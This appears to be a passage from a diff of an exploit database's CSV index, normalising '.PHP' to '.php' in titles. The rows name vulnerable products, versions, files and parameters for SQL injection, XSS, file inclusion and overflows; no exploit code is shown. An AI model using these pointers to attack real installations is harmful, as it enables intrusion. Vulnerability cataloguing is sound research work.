+30109,platforms/php/webapps/30109.txt,"Particle Gallery 1.0 - Search.php Cross-Site Scripting Vulnerability",2007-05-30,Serapis.net,php,webapps,0 30110,platforms/linux/dos/30110.c,"Bochs 2.3 - Buffer Overflow and Denial of Service Vulnerabilities",2007-05-31,"Tavis Ormandy",linux,dos,0 -30111,platforms/php/webapps/30111.txt,"MyBloggie 2.1.x Index.PHP Multiple SQL Injection Vulnerabilities",2007-05-31,ls@calima.serapis.net,php,webapps,0 +30111,platforms/php/webapps/30111.txt,"MyBloggie 2.1.x Index.php Multiple SQL Injection Vulnerabilities",2007-05-31,ls@calima.serapis.net,php,webapps,0 30112,platforms/php/webapps/30112.txt,"PHP JackKnife 2.21 (PHPJK) G_Display.php iCategoryUnq Parameter SQL Injection",2007-05-31,"laurent gaffie",php,webapps,0 30113,platforms/php/webapps/30113.txt,"PHP JackKnife 2.21 (PHPJK) Search/DisplayResults.php iSearchID Parameter SQL Injection",2007-05-31,"laurent gaffie",php,webapps,0 30114,platforms/php/webapps/30114.txt,"PHP JackKnife 2.21 (PHPJK) UserArea/Authenticate.php sUName Parameter XSS",2007-05-31,"laurent gaffie",php,webapps,0 @@ -26856,12 +26857,12 @@ id,file,description,date,author,platform,type,port 30135,platforms/php/webapps/30135.txt,"PHPLive! 3.2.2 - admin/header.php admin[name] Parameter XSS",2007-06-01,ReZEN,php,webapps,0 30136,platforms/php/webapps/30136.txt,"PHPLive! 3.2.2 super/info.php BASE_URL Variable Parameter XSS",2007-06-01,ReZEN,php,webapps,0 30137,platforms/php/webapps/30137.txt,"PHPLive! 3.2.2 setup/footer.php Multiple Parameter XSS",2007-06-01,ReZEN,php,webapps,0 -30138,platforms/php/webapps/30138.txt,"Linker 2.0.4 Index.PHP Cross-Site Scripting Vulnerability",2007-06-02,vagrant,php,webapps,0 +30138,platforms/php/webapps/30138.txt,"Linker 2.0.4 Index.php Cross-Site Scripting Vulnerability",2007-06-02,vagrant,php,webapps,0 30139,platforms/multiple/dos/30139.c,"Agnitum Outpost Firewall 4.0 Outpost_IPC_HDR Local Denial of Service Vulnerability",2007-06-04,"Matousec Transparent security",multiple,dos,0 -30140,platforms/php/webapps/30140.txt,"Okyanusmedya Index.PHP Cross-Site Scripting Vulnerability",2007-06-04,vagrant,php,webapps,0 +30140,platforms/php/webapps/30140.txt,"Okyanusmedya Index.php Cross-Site Scripting Vulnerability",2007-06-04,vagrant,php,webapps,0 30141,platforms/asp/webapps/30141.txt,"Hunkaray Okul Portaly 1.1 Haberoku.ASP SQL Injection Vulnerability",2007-06-04,ertuqrul,asp,webapps,0 30142,platforms/linux/remote/30142.txt,"GDB 6.6 - Process_Coff_Symbol UPX File Buffer Overflow Vulnerability",2007-06-04,"KaiJern Lau",linux,remote,0 -30143,platforms/php/webapps/30143.txt,"WebStudio CMS Index.PHP Cross-Site Scripting Vulnerability",2007-06-04,"Glafkos Charalambous ",php,webapps,0 +30143,platforms/php/webapps/30143.txt,"WebStudio CMS Index.php Cross-Site Scripting Vulnerability",2007-06-04,"Glafkos Charalambous ",php,webapps,0 30144,platforms/windows/remote/30144.html,"eSellerate SDK 3.6.5 eSellerateControl365.DLL ActiveX Control Buffer Overflow Vulnerability",2007-06-04,shinnai,windows,remote,0 30145,platforms/ios/webapps/30145.txt,"Feetan Inc WireShare 1.9.1 iOS - Persistent Vulnerability",2013-12-08,Vulnerability-Lab,ios,webapps,0 30146,platforms/ios/webapps/30146.txt,"Print n Share 5.5 iOS - Multiple Web Vulnerabilities",2013-12-08,Vulnerability-Lab,ios,webapps,0 @@ -26870,20 +26871,20 @@ id,file,description,date,author,platform,type,port 30154,platforms/windows/local/30154.pl,"GOM Player 2.2.53.5169 - SEH Buffer Overflow (.reg)",2013-12-09,"Mike Czumak",windows,local,0 30159,platforms/asp/webapps/30159.txt,"ASP Folder Gallery Download_Script.ASP Arbitrary File Download Vulnerability",2007-06-06,freeprotect.net,asp,webapps,0 30160,platforms/windows/dos/30160.txt,"Microsoft Windows XP - GDI+ ICO File Remote Denial of Service Vulnerability",2007-06-06,"Dennis Rand",windows,dos,0 -30161,platforms/php/webapps/30161.txt,"Atom PhotoBlog 1.0.1/1.0.9AtomPhotoBlog.PHP Multiple Input Validation Vulnerabilities",2007-06-07,Serapis.net,php,webapps,0 +30161,platforms/php/webapps/30161.txt,"Atom PhotoBlog 1.0.1/1.0.9AtomPhotoBlog.php Multiple Input Validation Vulnerabilities",2007-06-07,Serapis.net,php,webapps,0 30162,platforms/php/webapps/30162.txt,"WMSCMS 2.0 - Multiple Cross-Site Scripting Vulnerabilities",2007-06-07,"Glafkos Charalambous ",php,webapps,0 30163,platforms/multiple/dos/30163.html,"Blue Coat Systems K9 Web Protection 32.36 - Remote Buffer Overflow Vulnerability",2007-06-08,"Dennis Rand",multiple,dos,0 -30164,platforms/hardware/remote/30164.txt,"3Com OfficeConnect Secure Router 1.04-168 Tk Parameter Cross-Site Scripting Vulnerability",2007-06-08,"Secunia Research",hardware,remote,0 +30164,platforms/hardware/remote/30164.txt,"3Com OfficeConnect Secure Router 1.04-168 - Tk Parameter Cross-Site Scripting Vulnerability",2007-06-08,"Secunia Research",hardware,remote,0 30165,platforms/asp/webapps/30165.txt,"Ibrahim Ã?AKICI Okul Portal Haber_Oku.ASP - SQL Injection Vulnerability",2007-06-08,ertuqrul,asp,webapps,0 30166,platforms/php/webapps/30166.txt,"WordPress 2.2 - Request_URI Parameter Cross-Site Scripting Vulnerability",2007-06-08,zamolx3,php,webapps,0 30167,platforms/hardware/dos/30167.txt,"Packeteer PacketShaper 7.x Web Interface Remote Denial of Service Vulnerability",2007-06-08,nnposter,hardware,dos,0 -30168,platforms/php/webapps/30168.txt,"vBSupport 2.0.0 Integrated Ticket System vBSupport.PHP SQL Injection Vulnerability",2007-06-09,rUnViRuS,php,webapps,0 +30168,platforms/php/webapps/30168.txt,"vBSupport 2.0.0 Integrated Ticket System vBSupport.php SQL Injection Vulnerability",2007-06-09,rUnViRuS,php,webapps,0 30169,platforms/windows/remote/30169.txt,"WindowsPT 1.2 User ID Key Spoofing Vulnerability",2007-06-11,nnposter,windows,remote,0 30171,platforms/php/webapps/30171.txt,"JFFNms 0.8.3 - auth.php Multiple Parameter SQL Injection",2007-06-11,"Tim Brown",php,webapps,0 30172,platforms/php/webapps/30172.txt,"JFFNms 0.8.3 - auth.php user Parameter XSS",2007-06-11,"Tim Brown",php,webapps,0 30173,platforms/php/webapps/30173.txt,"JFFNms 0.8.3 admin/adm/test.php PHP Information Disclosure",2007-06-11,"Tim Brown",php,webapps,0 30174,platforms/php/webapps/30174.txt,"JFFNms 0.8.3 admin/setup.php Direct Request Authentication Bypass",2007-06-11,"Tim Brown",php,webapps,0 -30175,platforms/php/webapps/30175.txt,"BBpress 0.8.1 BB-Login.PHP Cross-Site Scripting Vulnerability",2007-06-11,"Ory Segal",php,webapps,0 +30175,platforms/php/webapps/30175.txt,"BBpress 0.8.1 BB-Login.php Cross-Site Scripting Vulnerability",2007-06-11,"Ory Segal",php,webapps,0 30176,platforms/windows/remote/30176.html,"Apple Safari 3 for Windows Protocol Handler Command Injection Vulnerability",2007-06-12,"Thor Larholm",windows,remote,0 30177,platforms/php/webapps/30177.txt,"PlaySms <= 0.9.9.2 - CSRF",2013-12-10,"Saadi Siddiqui",php,webapps,0 30205,platforms/asp/webapps/30205.txt,"Comersus Cart 7.0.7 Cart comersus_message.asp redirectUrl XSS",2007-06-20,Doz,asp,webapps,0 @@ -26901,8 +26902,8 @@ id,file,description,date,author,platform,type,port 29802,platforms/hardware/webapps/29802.txt,"TPLINK WR740N/WR740ND - Multiple CSRF Vulnerabilities",2013-11-25,"Samandeep Singh",hardware,webapps,0 29803,platforms/windows/dos/29803.pl,"Static Http Server 1.0 - Denial of Service (DoS) Exploit",2013-11-25,GalaxyAndroid,windows,dos,0 29804,platforms/php/local/29804.php,"PHP <= 5.2.1 - Multiple Functions Reference Parameter Information Disclosure Vulnerability",2007-03-29,"Stefan Esser",php,local,0 -29805,platforms/php/webapps/29805.txt,"Drake CMS 0.3.7 404.PHP Local File Include Vulnerability",2007-03-30,"HACKERS PAL",php,webapps,0 -29806,platforms/php/webapps/29806.pl,"PHP-Fusion <= 6.1.5 Calendar_Panel Module Show_Event.PHP SQL Injection Vulnerability",2007-03-31,UNIQUE-KEY,php,webapps,0 +29805,platforms/php/webapps/29805.txt,"Drake CMS 0.3.7 404.php Local File Include Vulnerability",2007-03-30,"HACKERS PAL",php,webapps,0 +29806,platforms/php/webapps/29806.pl,"PHP-Fusion <= 6.1.5 Calendar_Panel Module Show_Event.php SQL Injection Vulnerability",2007-03-31,UNIQUE-KEY,php,webapps,0 29807,platforms/php/remote/29807.php,"PHP <= 5.1.6 Imap_Mail_Compose() Function Buffer Overflow Vulnerability",2007-03-31,"Stefan Esser",php,remote,0 29808,platforms/php/remote/29808.php,"PHP <= 5.1.6 - Msg_Receive() Memory Allocation Integer Overflow Vulnerability",2007-03-31,"Stefan Esser",php,remote,0 29809,platforms/linux/dos/29809.txt,"PulseAudio 0.9.5 Assert() Remote Denial of Service Vulnerability",2007-04-02,"Luigi Auriemma",linux,dos,0 @@ -26915,16 +26916,16 @@ id,file,description,date,author,platform,type,port 29818,platforms/windows/dos/29818.c,"ACDSee 9.0 Photo Manager Multiple BMP Denial of Service Vulnerabilities",2007-04-04,"Ivan Fratric",windows,dos,0 29819,platforms/windows/dos/29819.c,"IrfanView 3.99 - Multiple BMP Denial of Service Vulnerabilities",2007-04-04,"Ivan Fratric",windows,dos,0 29820,platforms/multiple/remote/29820.html,"Firebug 1.03 Rep.JS Script Code Injection Vulnerability",2007-03-06,"Thor Larholm",multiple,remote,0 -29821,platforms/php/webapps/29821.txt,"Livor 2.5 Index.PHP Cross-Site Scripting Vulnerability",2007-04-06,"Arham Muhammad",php,webapps,0 +29821,platforms/php/webapps/29821.txt,"Livor 2.5 Index.php Cross-Site Scripting Vulnerability",2007-04-06,"Arham Muhammad",php,webapps,0 29822,platforms/linux/local/29822.c,"Man Command -H Flag Local Buffer Overflow Vulnerability",2007-04-06,"Daniel Roethlisberger",linux,local,0 29823,platforms/php/dos/29823.c,"PHP <= 5.2.1 GD Extension WBMP File Integer Overflow Vulnerabilities",2007-04-07,"Ivan Fratric",php,dos,0 -29824,platforms/php/webapps/29824.txt,"QuizShock <= 1.6.1 - Auth.PHP HTML Injection Vulnerability",2007-04-09,"John Martinelli",php,webapps,0 -29825,platforms/php/webapps/29825.txt,"UBB.Threads <= 6.1.1 UBBThreads.PHP SQL Injection Vulnerability",2007-04-09,"John Martinelli",php,webapps,0 +29824,platforms/php/webapps/29824.txt,"QuizShock <= 1.6.1 - Auth.php HTML Injection Vulnerability",2007-04-09,"John Martinelli",php,webapps,0 +29825,platforms/php/webapps/29825.txt,"UBB.Threads <= 6.1.1 UBBThreads.php SQL Injection Vulnerability",2007-04-09,"John Martinelli",php,webapps,0 29826,platforms/linux/dos/29826.txt,"Linux Kernel 2.6.x - AppleTalk ATalk_Sum_SKB Function Denial of Service Vulnerability",2007-04-09,"Jean Delvare",linux,dos,0 -29827,platforms/php/webapps/29827.pl,"eCardMAX HotEditor 4.0 Keyboard.PHP Local File Include Vulnerability",2007-04-09,Liz0ziM,php,webapps,0 -29828,platforms/php/webapps/29828.html,"DeskPro 2.0.1 Login.PHP HTML Injection Vulnerability",2007-04-09,"John Martinelli",php,webapps,0 -29829,platforms/php/webapps/29829.txt,"Einfacher Passworschutz Index.PHP Cross-Site Scripting Vulnerability",2007-04-10,hackberry,php,webapps,0 -29830,platforms/php/webapps/29830.txt,"MyNews 4.2.2 Week_Events.PHP Remote File Include Vulnerability",2007-04-10,hackberry,php,webapps,0 +29827,platforms/php/webapps/29827.pl,"eCardMAX HotEditor 4.0 Keyboard.php Local File Include Vulnerability",2007-04-09,Liz0ziM,php,webapps,0 +29828,platforms/php/webapps/29828.html,"DeskPro 2.0.1 Login.php HTML Injection Vulnerability",2007-04-09,"John Martinelli",php,webapps,0 +29829,platforms/php/webapps/29829.txt,"Einfacher Passworschutz Index.php Cross-Site Scripting Vulnerability",2007-04-10,hackberry,php,webapps,0 +29830,platforms/php/webapps/29830.txt,"MyNews 4.2.2 Week_Events.php Remote File Include Vulnerability",2007-04-10,hackberry,php,webapps,0 29831,platforms/php/webapps/29831.txt,"DropAFew 0.2 newaccount2.php Arbitrary Account Creation",2007-04-10,"Alexander Klink",php,webapps,0 29832,platforms/php/webapps/29832.txt,"DropAFew 0.2 - search.php delete Action id Parameter SQL Injection",2007-04-10,"Alexander Klink",php,webapps,0 29833,platforms/php/webapps/29833.txt,"DropAFew 0.2 editlogcal.php save Action calories Parameter SQL Injection",2007-04-10,"Alexander Klink",php,webapps,0 @@ -26934,30 +26935,30 @@ id,file,description,date,author,platform,type,port 29838,platforms/php/webapps/29838.txt,"DotClear 1.2.x /ecrire/trackback.php post_id Parameter XSS",2007-04-11,nassim,php,webapps,0 29839,platforms/php/webapps/29839.txt,"DotClear 1.2.x /tools/thememng/index.php tool_url Parameter XSS",2007-04-11,nassim,php,webapps,0 29840,platforms/windows/remote/29840.html,"Roxio CinePlayer 3.2 SonicDVDDashVRNav.DLL ActiveX Control Remote Buffer Overflow Vulnerability",2007-04-11,"Carsten Eiram",windows,remote,0 -29841,platforms/php/webapps/29841.txt,"PHPFaber TopSites 3 Admin/Index.PHP Directory Traversal Vulnerability",2007-04-11,Dr.RoVeR,php,webapps,0 +29841,platforms/php/webapps/29841.txt,"PHPFaber TopSites 3 Admin/Index.php Directory Traversal Vulnerability",2007-04-11,Dr.RoVeR,php,webapps,0 29842,platforms/cgi/webapps/29842.txt,"Cosign 2.0.1/2.9.4a CGI Check Cookie Command Remote Authentication Bypass Vulnerability",2007-04-11,"Jon Oberheide",cgi,webapps,0 29843,platforms/windows/remote/29843.txt,"webMethods Glue <= 6.5.1 Console Directory Traversal Vulnerability",2007-04-11,"Patrick Webster",windows,remote,0 29844,platforms/cgi/webapps/29844.txt,"Cosign 2.0.1/2.9.4a CGI Register Command Remote Authentication Bypass Vulnerability",2007-04-11,"Jon Oberheide",cgi,webapps,0 29845,platforms/php/webapps/29845.txt,"phpwebnews 0.1 iklan.php m_txt Parameter XSS",2007-04-07,the_Edit0r,php,webapps,0 29846,platforms/php/webapps/29846.txt,"phpwebnews 0.1 index.php m_txt Parameter XSS",2007-04-07,the_Edit0r,php,webapps,0 29847,platforms/php/webapps/29847.txt,"phpwebnews 0.1 bukutamu.php m_txt Parameter XSS",2007-04-07,the_Edit0r,php,webapps,0 -29848,platforms/php/webapps/29848.txt,"TuMusika Evolution 1.6 Index.PHP Cross-Site Scripting Vulnerability",2007-04-12,the_Edit0r,php,webapps,0 +29848,platforms/php/webapps/29848.txt,"TuMusika Evolution 1.6 Index.php Cross-Site Scripting Vulnerability",2007-04-12,the_Edit0r,php,webapps,0 29849,platforms/php/webapps/29849.html,"ToendaCMS 1.5.3 HTTP Get And Post Forms HTML Injection Vulnerability",2007-04-12,"Hanno Boeck",php,webapps,0 29850,platforms/windows/dos/29850.txt,"eIQnetworks Enterprise Security Analyzer 2.5 - Multiple Buffer Overflow Vulnerabilities",2007-04-12,"Leon Juranic",windows,dos,0 29851,platforms/php/webapps/29851.txt,"MailBee WebMail Pro 3.4 Check_login.ASP Cross-Site Scripting Vulnerability",2007-04-13,"David Vieira-Kurz",php,webapps,0 29852,platforms/php/webapps/29852.txt,"Doop Content Management System 1.3.x - Multiple Input Validation Vulnerabilities",2007-04-13,KaBuS,php,webapps,0 29853,platforms/windows/remote/29853.rb,"LanDesk Management Suite 8.7 Alert Service AOLSRVR.EXE Buffer Overflow Vulnerability",2007-04-13,"Aaron Portnoy",windows,remote,0 -29854,platforms/php/webapps/29854.txt,"BloofoxCMS 0.2.2 Img_Popup.PHP Cross-Site Scripting Vulnerability",2007-04-14,the_Edit0r,php,webapps,0 -29855,platforms/php/webapps/29855.txt,"Flowers Cas.PHP Cross-Site Scripting Vulnerability",2007-04-14,the_Edit0r,php,webapps,0 +29854,platforms/php/webapps/29854.txt,"BloofoxCMS 0.2.2 Img_Popup.php Cross-Site Scripting Vulnerability",2007-04-14,the_Edit0r,php,webapps,0 +29855,platforms/php/webapps/29855.txt,"Flowers Cas.php Cross-Site Scripting Vulnerability",2007-04-14,the_Edit0r,php,webapps,0 29857,platforms/windows/remote/29857.rb,"Microsoft Internet Explorer - CardSpaceClaimCollection ActiveX Integer Underflow (MS13-090)",2013-11-27,metasploit,windows,remote,0 29858,platforms/windows/remote/29858.rb,"Microsoft Internet Explorer - COALineDashStyleArray Unsafe Memory Access (MS12-022)",2013-11-27,metasploit,windows,remote,0 29859,platforms/java/remote/29859.rb,"Apache Roller OGNL Injection",2013-11-27,metasploit,java,remote,8080 29860,platforms/windows/dos/29860.c,"ZoneAlarm 6.1.744.001/6.5.737.000 Vsdatant.SYS Driver Local Denial of Service Vulnerability",2007-04-15,"Matousec Transparent security",windows,dos,0 29861,platforms/php/webapps/29861.txt,"Palo Alto Networks Pan-OS 5.0.8 - Multiple Vulnerabilities",2013-11-27,"Thomas Pollet",php,webapps,0 -29862,platforms/php/webapps/29862.pl,"Web Service Deluxe News Manager 1.0.1 Deluxe Footer.PHP Local File Include Vulnerability",2007-04-16,BeyazKurt,php,webapps,0 -29863,platforms/php/webapps/29863.txt,"Actionpoll 1.1 Actionpoll.PHP Remote File Include Vulnerability",2007-04-16,SekoMirza,php,webapps,0 -29864,platforms/php/webapps/29864.php,"MyBlog 0.9.8 Settings.PHP Authentication Bypass Vulnerability",2007-04-16,BlackHawk,php,webapps,0 -29865,platforms/php/webapps/29865.txt,"Wabbit Gallery Script 0.9 Showpic.PHP Multiple Cross-Site Scripting Vulnerabilities",2007-04-17,the_Edit0r,php,webapps,0 +29862,platforms/php/webapps/29862.pl,"Web Service Deluxe News Manager 1.0.1 Deluxe Footer.php Local File Include Vulnerability",2007-04-16,BeyazKurt,php,webapps,0 +29863,platforms/php/webapps/29863.txt,"Actionpoll 1.1 Actionpoll.php Remote File Include Vulnerability",2007-04-16,SekoMirza,php,webapps,0 +29864,platforms/php/webapps/29864.php,"MyBlog 0.9.8 Settings.php Authentication Bypass Vulnerability",2007-04-16,BlackHawk,php,webapps,0 +29865,platforms/php/webapps/29865.txt,"Wabbit Gallery Script 0.9 Showpic.php Multiple Cross-Site Scripting Vulnerabilities",2007-04-17,the_Edit0r,php,webapps,0 29866,platforms/php/webapps/29866.txt,"PHP-Nuke 8.0.3.3b - SQL Injection Protection Bypass and Multiple SQL Injection Vulnerabilities",2007-04-17,Aleksandar,php,webapps,0 29867,platforms/windows/dos/29867.xml,"NetSprint Ask IE Toolbar 1.1 - Multiple Denial of Service Vulnerabilities",2007-04-17,"Michal Bucko",windows,dos,0 29868,platforms/php/webapps/29868.txt,"NuclearBB Alpha 1 - Multiple SQL Injection Vulnerabilities",2007-04-18,"John Martinelli",php,webapps,0 @@ -26966,19 +26967,19 @@ id,file,description,date,author,platform,type,port 29871,platforms/php/webapps/29871.txt,"Exponent CMS 0.96.5/ 0.96.6 magpie_slashbox.php rss_url Parameter XSS",2007-04-20,"Hamid Ebadi",php,webapps,0 29872,platforms/php/webapps/29872.txt,"Exponent CMS 0.96.5/ 0.96.6 iconspopup.php icodir Variable Traversal Arbitrary Directory Listing",2007-04-20,"Hamid Ebadi",php,webapps,0 29873,platforms/multiple/remote/29873.php,"FreePBX 2.2 - SIP Packet Multiple HTML Injection Vulnerabilities",2007-04-20,XenoMuta,multiple,remote,0 -29874,platforms/php/webapps/29874.txt,"PHP Turbulence 0.0.1 Turbulence.PHP Remote File Include Vulnerability",2007-04-20,Omni,php,webapps,0 +29874,platforms/php/webapps/29874.txt,"PHP Turbulence 0.0.1 Turbulence.php Remote File Include Vulnerability",2007-04-20,Omni,php,webapps,0 29875,platforms/multiple/dos/29875.py,"AMSN 0.96 - Malformed Message Denial of Service Vulnerability",2007-04-21,"Levent Kayan",multiple,dos,0 -29876,platforms/php/webapps/29876.txt,"TJSChat 0.95 You.PHP Cross-Site Scripting Vulnerability",2007-04-23,the_Edit0r,php,webapps,0 +29876,platforms/php/webapps/29876.txt,"TJSChat 0.95 You.php Cross-Site Scripting Vulnerability",2007-04-23,the_Edit0r,php,webapps,0 29877,platforms/php/webapps/29877.html,"Ripe Website Manager 0.8.4 contact/index.php ripeformpost Parameter SQL Injection",2007-04-23,"John Martinelli",php,webapps,0 -29878,platforms/php/webapps/29878.txt,"Allfaclassifieds 6.04 Level2.PHP Remote File Include Vulnerability",2007-04-23,Dr.RoVeR,php,webapps,0 -29879,platforms/php/webapps/29879.txt,"PHPMyBibli 1.32 Init.Inc.PHP Remote File Include Vulnerability",2007-04-23,MoHaNdKo,php,webapps,0 +29878,platforms/php/webapps/29878.txt,"Allfaclassifieds 6.04 Level2.php Remote File Include Vulnerability",2007-04-23,Dr.RoVeR,php,webapps,0 +29879,platforms/php/webapps/29879.txt,"PHPMyBibli 1.32 Init.Inc.php Remote File Include Vulnerability",2007-04-23,MoHaNdKo,php,webapps,0 29880,platforms/php/webapps/29880.txt,"File117 - Multiple Remote File Include Vulnerabilities",2007-04-23,InyeXion,php,webapps,0 29881,platforms/windows/local/29881.txt,"Adobe Acrobat Reader - ASLR/DEP Bypass Exploit with SANDBOX BYPASS",2013-11-28,"w3bd3vil and abh1sek",windows,local,0 -29882,platforms/php/webapps/29882.html,"PHPMySpace Gold 8.10 Article.PHP SQL Injection Vulnerability",2007-04-23,"John Martinelli",php,webapps,0 -29883,platforms/php/webapps/29883.txt,"ACVSWS Transport.PHP Remote File Include Vulnerability",2007-04-23,MoHaNdKo,php,webapps,0 +29882,platforms/php/webapps/29882.html,"PHPMySpace Gold 8.10 Article.php SQL Injection Vulnerability",2007-04-23,"John Martinelli",php,webapps,0 +29883,platforms/php/webapps/29883.txt,"ACVSWS Transport.php Remote File Include Vulnerability",2007-04-23,MoHaNdKo,php,webapps,0 29884,platforms/multiple/remote/29884.txt,"Apple Quicktime <= 7.1.5 QTJava toQTPointer() Java Handling Arbitrary Code Execution Vulnerability",2007-04-23,"Shane Macaulay",multiple,remote,0 29885,platforms/php/webapps/29885.txt,"Claroline 1.x RootSys Remote File Include Vulnerability",2007-04-23,MoHaNdKo,php,webapps,0 -29886,platforms/php/webapps/29886.txt,"Lms 1.5.x RTMessageAdd.PHP Remote File Include Vulnerability",2007-04-23,InyeXion,php,webapps,0 +29886,platforms/php/webapps/29886.txt,"Lms 1.5.x RTMessageAdd.php Remote File Include Vulnerability",2007-04-23,InyeXion,php,webapps,0 29887,platforms/php/webapps/29887.txt,"Phorum 5.1.20 admin.php Groups Module group_id Parameter XSS",2007-04-23,"Janek Vind",php,webapps,0 29888,platforms/php/webapps/29888.txt,"Phorum 5.1.20 admin.php modsettings Module smiley_id Parameter XSS",2007-04-23,"Janek Vind",php,webapps,0 29889,platforms/php/webapps/29889.txt,"Phorum 5.1.20 - include/controlcenter/users.php Multiple Method Remote Privilege Escalation",2007-04-23,"Janek Vind",php,webapps,0 @@ -26991,23 +26992,23 @@ id,file,description,date,author,platform,type,port 29896,platforms/windows/dos/29896.c,"Cdelia Software ImageProcessing Malformed BMP File Denial of Service Vulnerability",2007-04-24,Dr.Ninux,windows,dos,0 29897,platforms/windows/remote/29897.txt,"Progress 3.1 Webspeed _CPYFile.P Unauthorized Access Vulnerability",2007-04-24,suresync,windows,remote,0 29898,platforms/php/webapps/29898.txt,"plesk <= 8.1.1 login.php3 - Directory Traversal Vulnerability",2007-04-25,anonymous,php,webapps,0 -29899,platforms/php/webapps/29899.txt,"MyNewsGroups 0.6 Include.PHP Remote File Include Vulnerability",2007-04-25,"Ali and Saeid",php,webapps,0 +29899,platforms/php/webapps/29899.txt,"MyNewsGroups 0.6 Include.php Remote File Include Vulnerability",2007-04-25,"Ali and Saeid",php,webapps,0 29900,platforms/multiple/dos/29900.txt,"Asterisk 1.4 SIP T.38 SDP - Parsing Remote Stack Buffer Overflow Vulnerabilities (1)",2007-03-21,"Barrie Dempster",multiple,dos,0 29901,platforms/multiple/dos/29901.txt,"Asterisk 1.4 SIP T.38 SDP - Parsing Remote Stack Buffer Overflow Vulnerabilities (2)",2007-03-21,"Barrie Dempster",multiple,dos,0 -29902,platforms/php/webapps/29902.txt,"PHPMyTGP 1.4 AddVIP.PHP Remote File Include Vulnerability",2007-04-25,alijsb,php,webapps,0 -29903,platforms/php/webapps/29903.txt,"Ahhp Portal Page.PHP Multiple Remote File Include Vulnerabilities",2007-04-25,CodeXpLoder'tq,php,webapps,0 +29902,platforms/php/webapps/29902.txt,"PHPMyTGP 1.4 AddVIP.php Remote File Include Vulnerability",2007-04-25,alijsb,php,webapps,0 +29903,platforms/php/webapps/29903.txt,"Ahhp Portal Page.php Multiple Remote File Include Vulnerabilities",2007-04-25,CodeXpLoder'tq,php,webapps,0 29904,platforms/php/webapps/29904.txt,"CafeLog B2 0.6.1 Weblog and News Publishing Tool b2archives.php b2inc Parameter Remote File Inclusion",2006-04-25,alijsb,php,webapps,0 29905,platforms/php/webapps/29905.txt,"CafeLog B2 0.6.1 Weblog and News Publishing Tool b2categories.php b2inc Parameter Remote File Inclusion",2006-04-25,alijsb,php,webapps,0 29906,platforms/php/webapps/29906.txt,"CafeLog B2 0.6.1 Weblog and News Publishing Tool b2mail.php b2inc Parameter Remote File Inclusion",2006-04-25,alijsb,php,webapps,0 -29907,platforms/php/webapps/29907.txt,"Comus 2.0 Accept.PHP Remote File Include Vulnerability",2007-04-25,alijsb,php,webapps,0 +29907,platforms/php/webapps/29907.txt,"Comus 2.0 Accept.php Remote File Include Vulnerability",2007-04-25,alijsb,php,webapps,0 29908,platforms/php/webapps/29908.txt,"TurnkeyWebTools Sunshop 3.5/4.0 - Multiple Remote File Include Vulnerabilities",2007-04-25,s3rv3r_hack3r,php,webapps,0 29909,platforms/php/webapps/29909.txt,"HYIP Manager Pro Multiple Remote File Include Vulnerabilities",2007-04-25,alijsb,php,webapps,0 -29910,platforms/php/webapps/29910.txt,"HTMLEditBox 2.2 Config.PHP Remote File Include Vulnerability",2007-04-25,alijsb,php,webapps,0 +29910,platforms/php/webapps/29910.txt,"HTMLEditBox 2.2 Config.php Remote File Include Vulnerability",2007-04-25,alijsb,php,webapps,0 29911,platforms/php/webapps/29911.txt,"DynaTracker 1.5.1 includes_handler.php base_path Remote File Inclusion",2007-04-25,alijsb,php,webapps,0 29912,platforms/php/webapps/29912.txt,"DynaTracker 1.5.1 action.php base_path Remote File Inclusion",2007-04-25,alijsb,php,webapps,0 -29913,platforms/php/webapps/29913.txt,"Active PHP Bookmarks 1.0 APB.PHP Remote File Include Vulnerability",2007-04-25,"ali & saeid",php,webapps,0 -29914,platforms/php/webapps/29914.txt,"Doruk100Net Info.PHP Remote File Include Vulnerability",2007-04-26,Ali7,php,webapps,0 -29915,platforms/php/webapps/29915.txt,"MoinMoin 1.5.x Index.PHP Cross-Site Scripting Vulnerability",2007-04-26,"En Douli",php,webapps,0 +29913,platforms/php/webapps/29913.txt,"Active PHP Bookmarks 1.0 APB.php Remote File Include Vulnerability",2007-04-25,"ali & saeid",php,webapps,0 +29914,platforms/php/webapps/29914.txt,"Doruk100Net Info.php Remote File Include Vulnerability",2007-04-26,Ali7,php,webapps,0 +29915,platforms/php/webapps/29915.txt,"MoinMoin 1.5.x Index.php Cross-Site Scripting Vulnerability",2007-04-26,"En Douli",php,webapps,0 29916,platforms/linux/dos/29916.c,"Linux Kernel 2.6.x - NETLINK_FIB_LOOKUP Local Denial of Service Vulnerability",2007-04-26,"Alexey Kuznetsov",linux,dos,0 29917,platforms/php/webapps/29917.php,"FlashComs Chat <= 6.5 - Arbitrary File Upload Vulnerability",2013-11-30,"Miya Chung",php,webapps,0 29918,platforms/java/webapps/29918.txt,"Ametys CMS 3.5.2 - (lang parameter) XPath Injection Vulnerability",2013-11-30,LiquidWorm,java,webapps,0 @@ -27025,25 +27026,25 @@ id,file,description,date,author,platform,type,port 29933,platforms/asp/webapps/29933.txt,"Gazi Download Portal Down_Indir.ASP SQL Injection Vulnerability",2007-04-30,ertuqrul,asp,webapps,0 29934,platforms/windows/dos/29934.py,"ZIP Password Recovery Professional 5.1 - (.zip) Crash PoC",2013-11-30,KAI,windows,dos,0 29935,platforms/php/webapps/29935.php,"MyBB <= 1.6.11 - Remote Code Execution",2013-11-30,BlackDream,php,webapps,0 -29938,platforms/php/webapps/29938.txt,"E-Annu Home.PHP SQL Injection Vulnerability",2007-04-30,ilkerkandemir,php,webapps,0 +29938,platforms/php/webapps/29938.txt,"E-Annu Home.php SQL Injection Vulnerability",2007-04-30,ilkerkandemir,php,webapps,0 29939,platforms/linux/dos/29939.txt,"X.Org X Window System Xserver 1.3 XRender Extension Divide by Zero Denial of Service Vulnerability",2007-05-01,"Derek Abdine",linux,dos,0 29940,platforms/windows/dos/29940.html,"Mozilla Firefox 2.0.0.3 Href Denial of Service Vulnerability",2007-05-01,"Carl Hardwick",windows,dos,0 -29941,platforms/php/webapps/29941.txt,"CMS Made Simple 105 Stylesheet.PHP SQL Injection Vulnerability",2007-05-02,"Daniel Lucq",php,webapps,0 +29941,platforms/php/webapps/29941.txt,"CMS Made Simple 105 Stylesheet.php SQL Injection Vulnerability",2007-05-02,"Daniel Lucq",php,webapps,0 29942,platforms/windows/dos/29942.c,"Atomix MP3 Malformed MP3 File Buffer Overflow Vulnerability",2007-05-02,preth00nker,windows,dos,0 29943,platforms/windows/dos/29943.c,"Progress WebSpeed 3.0/3.1 - Denial of Service Vulnerability",2007-05-02,"Eelko Neven",windows,dos,0 -29944,platforms/php/webapps/29944.pl,"PHPSecurityAdmin 4.0.2 Logout.PHP Remote File Include 